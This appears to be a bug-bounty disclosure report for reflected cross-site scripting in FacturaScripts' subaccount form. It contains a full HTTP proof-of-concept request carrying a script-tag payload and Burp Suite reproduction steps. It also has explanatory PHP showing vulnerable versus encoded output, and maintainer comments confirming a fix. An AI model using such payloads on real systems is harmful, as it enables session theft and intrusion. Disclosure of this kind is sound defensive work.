Cross-site scripting - Reflected in Create Subaccount in neorazorx/facturascripts

Valid

Reported on

Apr 30th 2022


Description

Cross-site scripting - Reflected in Create Subaccount via codsubcuenta parameter.

Proof of Concept

POST /facturascripts/EditSubcuenta HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------363416527826407339693188325960
Content-Length: 1558
Origin: http://localhost
Connection: close
Referer: http://localhost/facturascripts/EditSubcuenta
Cookie: fsNick=admin; fsLogkey=6pCG4IKxZ8oOUTkeVg5siaMfyR2q37Bb9JhYvAPlXH1rLWdcmFSNun0wjzQtED; fsLang=en_EN; fsCompany=1; lhc_vid=0155fb94b7b38957dfc4; lhc_rm_u=GW6CXYX9Kvs3laO9i4fjnR7ruXW44H%3A1%3A87494d3c0efceb6d8d9974ea5e6c9f11881b9ee0; organizrLanguage=en; csrf-token-data=%7B%22value%22%3A%22jzfiNNFxYEXZET6aCcebWmglZOg2JPA9SsDylMUM%22%2C%22expiry%22%3A1651160325308%7D; lang=en_US; 
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="action"

insert
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="activetab"

EditSubcuenta
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="code"


-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="multireqtoken"

99a8c7a2305b11e06fbd8bc0c9446f0826e73bdd|5yqptN
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codsubcuenta"

<script>alert(1337)</script>
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="descripcion"

123123
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codejercicio"

2022
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="idcuenta"


-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codcuentaesp"

CLIENT
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="debe"

0
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="haber"

0
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="saldo"

0
-----------------------------363416527826407339693188325960--

Steps to reproduce

  1. In the Accounting section, choose New and fill in the form with any values.

  2. Use Burp Suite to intercept the request, change the codsubcuenta parameter value to the XSS payload and click Forward.

  3. The alert(1337) executes.

Impact

This vulnerability allows arbitrary JavaScript to execute in the victim's browser, which can be used to steal the user's cookies, perform HTTP requests, read the content of same-origin pages, etc.
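As an added example (not code from FacturaScripts or the reporter), the pattern behind this bug class in PHP: the submitted codsubcuenta value rendered into an HTML attribute without encoding, next to the hardened form that entity-encodes it, plus an input allowlist as defence in depth. The function names and the allowed subaccount-code alphabet are assumptions for illustration, not the project's real rules.

```php
<?php
// Added example, not FacturaScripts' own code: the same form field the
// report abuses (codsubcuenta), rendered two ways. Both functions return the
// HTML fragment so the difference can be compared side by side.

// Vulnerable pattern: the submitted value is concatenated straight into the
// page, so any markup inside it is parsed by the browser.
function renderUnsafe(string $codsubcuenta): string
{
    return '<input name="codsubcuenta" value="' . $codsubcuenta . '">';
}

// Hardened pattern: encode for the HTML attribute context before output.
// ENT_QUOTES also encodes single quotes, which matters inside attributes.
function renderSafe(string $codsubcuenta): string
{
    $encoded = htmlspecialchars($codsubcuenta, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input name="codsubcuenta" value="' . $encoded . '">';
}

// Defence in depth: reject values that cannot be a subaccount code at all,
// so the encoder is not the only line of defence. The allowed alphabet
// (digits and dots, at most 15 characters) is an assumption for this example.
function isValidSubaccountCode(string $codsubcuenta): bool
{
    return preg_match('/^[0-9.]{1,15}$/', $codsubcuenta) === 1;
}

// Constructed input: the payload from the report.
$submitted = '<script>alert(1337)</script>';

echo "unsafe: " . renderUnsafe($submitted) . PHP_EOL;
echo "safe:   " . renderSafe($submitted) . PHP_EOL;
echo "valid:  " . (isValidSubaccountCode($submitted) ? 'yes' : 'no') . PHP_EOL;
```

Running it shows the unsafe fragment carrying the raw script tag while the safe one carries `&lt;script&gt;...`, and the validator rejecting the value outright. Encoding must match the output context (attribute, element body, JavaScript, URL); validation alone is not a substitute, because a value that passes the allowlist still has to be encoded wherever it is reflected.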

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. a month ago
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back a month ago
Nhien.IT
a month ago

Researcher


Hi @admin,

Can you help me contact the maintainer?

Jamie Slome
a month ago

Admin


@nhienit2010 - our system will reach out to the maintainer automatically and notify them of your report. The maintainer is extremely active on the platform, so I am sure you will hear back shortly ♥️

Nhien.IT
a month ago

Researcher


Thank you a lot <3

Carlos Garcia validated this vulnerability 25 days ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carlos Garcia confirmed that a fix has been merged on 482c5a 25 days ago
Carlos Garcia has been awarded the fix bounty
Nhien.IT
24 days ago

Researcher


Hi @maintainer, the fix is already released, can you assign a CVE here? If you can, hope @admin helps

Jamie Slome
24 days ago

Admin


Sorted 👍
